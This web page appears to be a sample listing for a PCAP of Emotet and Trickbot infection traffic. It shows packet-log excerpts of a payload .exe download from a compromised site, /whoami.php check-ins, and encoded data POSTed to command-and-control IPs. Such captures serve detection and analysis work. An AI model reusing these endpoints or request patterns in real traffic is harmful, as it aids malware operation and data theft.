Text Example

Emotet Banking Trojan and Trickbot Malware Traffic Sample infection w/Spambot Noise PCAP file Download

2019-09-18 13:32:22.678529 IP 10.9.18.101.49160 > 124.158.6.218.80: Flags [P.], seq 4191540612:4191540891, ack 2860101733, win 64240, length 279: HTTP: GET /wp-admin/n2keep7/ HTTP/1.1
E..?..@…Y1
.e|……P…..y.eP…Y…GET /wp-admin/n2keep7/ HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: thinhvuongmedia.com
DNT: 1
Connection: Keep-Alive

2019-09-18 13:32:22.942838 IP 124.158.6.218.80 > 10.9.18.101.49160: Flags [P.], seq 1:1277, ack 279, win 64240, length 1276: HTTP: HTTP/1.1 200 OK
E..$T…..A.|…
.e.P…y.e….P…….HTTP/1.1 200 OK
Date: Wed, 18 Sep 2019 17:26:02 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.33
X-Powered-By: PHP/5.6.33
Set-Cookie: 5d8268aa1193f=1568827562; expires=Wed, 18-Sep-2019 17:27:02 GMT; Max-Age=60; path=/
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Wed, 18 Sep 2019 17:26:02 GMT
Expires: Wed, 18 Sep 2019 17:26:02 GMT
Content-Disposition: attachment; filename=”i5pv72yr.exe”
Content-Transfer-Encoding: binary
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload

2019-09-18 13:33:30.627377 IP 10.9.18.101.49165 > 66.228.32.31.443: Flags [P.], seq 3657721627:3657721896, ack 2496123025, win 64240, length 269
E..5..@…vV
.eB. …….g…..P…”…GET /whoami.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 66.228.32.31:443
Cache-Control: no-cache

2019-09-18 13:33:30.669920 IP 10.9.18.101.49164 > 189.129.4.186.80: Flags [P.], seq 899:1832, ack 2600252, win 63022, length 933: HTTP: POST /rtm/symbols/ HTTP/1.1
E…..@…..
.e…….Pr..G..^.P…….POST /rtm/symbols/ HTTP/1.1
Referer: http://189.129.4.186/rtm/symbols/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 189.129.4.186
Content-Length: 518
Connection: Keep-Alive
Cache-Control: no-cache

6ll8i995327yEb1qC=SbbKQbNltyr7OEcfzxrUQ304Q2%2FW6l5R9lo%2B5pVxib%2FIt4w3Sjeay5KbFubuIws4O0t7iA%2FTTdyiyRHbY7ySX3cga1z4cQuduITiXM9R5e7rTet9Uod5fFGxgh4JKFGS5n1sQ2TqoRhHBRx7cyBqBFIuag5dqUNeimMgsfRfYiwz39hBgErZ2D0Phl7Y6pFo%2BgASm3UxQKPwVMO8ux4AN2qvVtS2pEQ1HZZcDFci1m1YUNPlvgGhz6Gdpiiz2nZ%2Fr4fpHEK8spNliNSciLGdp7XKmD3rkLzPW5Y2Gm6J0PHywumZH0hJryQUQdwGmeWY8LiNcnQW4bRzxcA%2FSgIA0B8peygnfyCIwigVnD%2FwUBRRFjTCh5crDpm86cA9sZx1tnMgWbVF3cyJLDXvAkyYI%2B9IReYi9WIMTYjpUuPBxEm5zYaLYolpypw07kquVeRU5xXpSD3wp4D7w%2BmBFphGa1%2FKfn4%3D
2019-09-18 13:33:30.713609 IP 10.9.18.101.49166 > 104.236.185.25.8080: Flags [P.], seq 1031397366:1031397638, ack 3231780717, win 64240, length 272: HTTP: GET /whoami.php HTTP/1.1
E..8..@….K
.eh…….=y…..mP…….GET /whoami.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 104.236.185.25:8080
Cache-Control: no-cache

2019-09-18 13:33:30.722484 IP 10.9.18.101.49167 > 104.236.185.25.8080: Flags [P.], seq 2799073531:2799073803, ack 2887398240, win 64240, length 272: HTTP: GET /whoami.php HTTP/1.1
E..8..@….I
.eh………x…3`P…….GET /whoami.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 104.236.185.25:8080
Cache-Control: no-cache

2019-09-18 13:33:31.019952 IP 66.228.32.31.443 > 10.9.18.101.49165: Flags [P.], seq 1:211, ack 269, win 64240, length 210
E…]…..].B. .
.e……….h(P….P..HTTP/1.1 200 OK
Server: nginx
Date: Wed, 18 Sep 2019 17:33:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding

e
173.66.146.112
0

2019-09-18 13:33:31.096777 IP 189.129.4.186.80 > 10.9.18.101.49164: Flags [P.], seq 2600252:2600556, ack 1832, win 64240, length 304: HTTP: HTTP/1.1 200 OK
E..X]……p….
.e.P….^.r.!.P…….HTTP/1.1 200 OK
Server: nginx
Date: Wed, 18 Sep 2019 17:33:30 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 148
Connection: keep-alive

2019-09-18 13:33:35.224641 IP 10.9.18.101.49184 > 66.228.32.31.443: Flags [P.], seq 497095651:497096370, ack 1689891519, win 64240, length 719
E…..@…k.
.eB. .. ……d…P….x..POST /arizona/forced/sess/merge/ HTTP/1.1
Referer: http://66.228.32.31/arizona/forced/sess/merge/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 66.228.32.31:443
Content-Length: 274
Connection: Keep-Alive
Cache-Control: no-cache

Gr2qPfZCOq0zLdd=i7eSuPXcauG6h3x4nXsddr2HLhaseSX3P3dp7S4gBcKhcmoqkbf7HcBzb%2Brohq%2FeEkR%2BTnIjMI8V8T%2BAxqF%2FTEK2DhDrGASZbhUbLTPbf1upgbttXYNLrhthHlz4c5qcEHunBZWx0TLZ6Jd6XQvpghjIetcPXLPTuULc9957VIe9PeppR6pU9rDnk2VG%2Fw1PflceQ%2Fw59Gx%2BnGblT3orLZBUGOgmdwfAYGBjYe%2BuZLDzlb1T

Leave a Reply